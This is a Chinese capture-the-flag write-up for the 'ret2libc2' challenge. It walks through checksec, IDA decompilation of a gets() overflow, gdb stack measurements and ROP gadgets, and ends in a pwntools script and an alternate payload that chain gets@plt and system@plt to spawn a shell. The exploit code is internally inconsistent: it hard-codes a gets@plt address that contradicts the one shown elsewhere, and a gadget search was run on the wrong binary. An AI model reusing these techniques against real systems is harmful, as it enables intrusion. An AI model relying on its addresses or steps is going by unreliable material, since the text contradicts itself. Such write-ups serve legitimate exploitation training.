一、题目
题目:ret2libc2
题目描述:返回地址更改为system@plt,再写入system@plt的虚假的返回地址,再写入system@plt的参数,但system@plt的参数/bin/sh由gets@plt写入
二、WriteUp
1 . checksec ret2libc2
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE ( 0x8048000)
2 .ida+F5
// IDA (F5) decompilation of the challenge binary, reproduced as shown in the writeup.
// The only input path is gets(), which is the overflow the following sections measure.
int __cdecl main(int argc, const char **argv, const char **envp)
{
// IDA renders the destination as a single char; the real object is a stack buffer
// (IDA says [ebp-64h]; the gdb measurement in section 4 puts the return address 112 bytes past its start).
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
// NOTE(review): IDA names the second stream `_bss_start`; presumably this is stdin — verify in the disassembly.
setvbuf(_bss_start, 0, 1, 0);
puts("Something surprise here, but I don't think it will work.");
printf("What do you think ?");
// gets() has no length limit, so a line longer than the buffer overwrites the saved ebp and return address.
// The bounded fix would be fgets(s, sizeof s, stdin).
gets(&s);
return 0;
}
Functions 窗口 --- 存在 system 函数
.plt:08048490 jmp ds:off_804A01C
.plt:08048490 _system endp
Functions 窗口 --- 存在 gets 函数
.plt:08048460 jmp ds:off_804A010
.plt:08048460 _gets endp
Shift+F12 (Strings 窗口) 中没有 /bin/sh 字符串, 因此考虑自行写入 /bin/sh
点击_bss_start 查看到bss段的buffer
.bss:0804A080 ; char buf2[ 100 ]
.bss:0804A080 buf2 db 64h dup( ?)
.bss:0804A080 _bss ends
首先调用 gets 函数把 /bin/sh 写入 buf2 中, 然后再以 buf2 的地址作为参数调用 system
elf = ELF( "./ret2libc2" )
elf. symbols( "buf2" )
elf. plt[ "system" ]
elf. plt[ "gets" ]
3 . ROPgadget --binary ret2libc1 --only "pop|ret"
无可用 (注: 此处 --binary 指定的是 ret2libc1 而非 ret2libc2; 第 7 节列出了 pop ebx ; ret 等 gadget, 与此结论不一致, 应以对 ret2libc2 重新运行的结果为准)
4 . gdb ret2libc2
b main
run
vmmap
0xfffdd000 0xffffe000 rw-p 21000 0 [ stack] //栈区不可执行
00:0000│ esp 0xffffd110 —▸ 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
01:0004│ 0xffffd114 ◂— 0x0
02:0008│ 0xffffd118 ◂— 0x1
03:000c│ 0xffffd11c ◂— 0x0
.. . ↓ 3 skipped
07:001c│ eax 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
08:0020│ 0xffffd130 ◂— 'BBBBCCCCDDDD'
09:0024│ 0xffffd134 ◂— 'CCCCDDDD'
0a:0028│ 0xffffd138 ◂— 'DDDD'
0b:002c│ 0xffffd13c ◂— 0x0
0c:0030│ 0xffffd140 —▸ 0x8048500 ( _start) ◂— xor ebp, ebp
0d:0034│ 0xffffd144 —▸ 0xf7fc9550 ( __kernel_vsyscall) ◂— push ecx
0e:0038│ 0xffffd148 —▸ 0x8048034 ◂— push es
0f:003c│ 0xffffd14c —▸ 0xf7fa5a08 ( __exit_funcs_lock) ◂— 0x0
10 :0040│ 0xffffd150 ◂— 0x1
11 :0044│ 0xffffd154 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
12 :0048│ 0xffffd158 ◂— 0x0
13 :004c│ 0xffffd15c —▸ 0x8048425 ( _init+9) ◂— add ebx, 0x1bdb
14 :0050│ 0xffffd160 —▸ 0xf7fa43fc ( __exit_funcs) —▸ 0xf7fa5a20 ( initial) ◂— 0x0
15 :0054│ 0xffffd164 ◂— 0xffffffff
16 :0058│ 0xffffd168 —▸ 0x804a000 ( _GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 ( _DYNAMIC) ◂— 0x1
17 :005c│ 0xffffd16c —▸ 0x8048722 ( __libc_csu_init+82) ◂— add edi, 1
18 :0060│ 0xffffd170 ◂— 0x1
19 :0064│ 0xffffd174 —▸ 0xffffd244 —▸ 0xffffd3f0 ◂— '/home/uaoe/Desktop/ti/ROP/ret2libc2'
1a:0068│ 0xffffd178 —▸ 0xffffd24c —▸ 0xffffd414 ◂— 'SHELL=/usr/bin/zsh'
1b:006c│ 0xffffd17c —▸ 0xf7df0a15 ( __cxa_atexit+37) ◂— add esp, 0x1c
1c:0070│ 0xffffd180 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
1d:0074│ 0xffffd184 ◂— 0x0
1e:0078│ 0xffffd188 —▸ 0x80486db ( __libc_csu_init+11) ◂— add ebx, 0x1925
1f:007c│ 0xffffd18c ◂— 0x0
20 :0080│ 0xffffd190 ◂— 0x1
21 :0084│ 0xffffd194 —▸ 0x8048500 ( _start) ◂— xor ebp, ebp
22 :0088│ ebp 0xffffd198 ◂— 0x0
23 :008c│ 0xffffd19c —▸ 0xf7dd7905 ( __libc_start_main+229) ◂— add esp, 0x10
ebp 地址 - eax 地址 = 0xffffd198 - 0xffffd12c = 0x6c = 108 字节, 再加上保存的 ebp 占的 4 字节, 即 108 + 4 = 112 字节后才是返回地址
或者在 gdb 中执行 plt 命令, 直接查看 gets@plt 和 system@plt 的地址
0x8048460: gets@plt
0x8048490: system@plt
5 . payload
垃圾数据*112字节
gets地址 0x08048460
system地址 0x08048490
buf2地址 0x0804A080
/bin/sh的地址 0x0804A080
6 .exp.py
from pwn import *
io = process( "./ret2libc2" )
# NOTE(review): the .plt listing in section 2 and the addresses in sections 4/5 all give
# gets@plt = 0x08048460; 0x0804842C disagrees with them — confirm against the binary.
gets_plt = 0x0804842C
# buf2 in .bss (section 2): gets() writes here, and the same address is later passed to system().
buf2_adr = 0x0804A080
system_plt = 0x08048490
# Layout (section 5): 112 bytes of padding up to the saved return address, then gets@plt;
# system@plt is the fake return address of gets, followed by gets's argument and system's argument.
payload = flat( [ b'A' * 112 , gets_plt, system_plt, buf2_adr, buf2_adr] )
io. sendline( payload)
# Second line is what the chained gets() call reads into buf2.
io. sendline( "/bin/sh" )
io. interactive( )
7 .另一种payload
Gadgets information
0x080486ef : pop ebp ; ret
0x080486ec : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804841d : pop ebx ; ret
0x080486ee : pop edi ; pop ebp ; ret
0x080486ed : pop esi ; pop edi ; pop ebp ; ret
0x08048406 : ret
0x0804854e : ret 0xeac1
垃圾数据*112字节
gets地址 0x08048460
0x0804841d : pop ebx ; ret
buf2地址 0x0804A080
system返回地址 0x08048490
0x0804841d : pop ebx ; ret
/bin/sh的地址 0x0804A080
三、总结
无